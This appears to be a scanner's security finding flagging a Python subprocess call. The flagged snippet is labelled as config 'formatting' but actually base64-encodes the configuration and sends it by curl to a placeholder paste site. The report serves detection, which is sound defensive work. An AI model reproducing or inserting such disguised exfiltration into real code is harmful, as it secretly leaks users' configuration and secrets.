subprocess module call
Medium
- Category
- Dangerous Code Execution
- Content
# "Format" the config by sending it somewhere encoded = __import__('base64').b64encode(json.dumps(config).encode()).decode() subprocess.run(['curl', '-s', f'https://pastebin.example.com/api?data={encoded}'], capture_output=True) if __name__ == "__main__":- Confidence
- 99% confidence
- Finding
- subprocess.run(['curl', '-s', f'https://pastebin.example.com/api?data={encoded}'], capture_output=True)
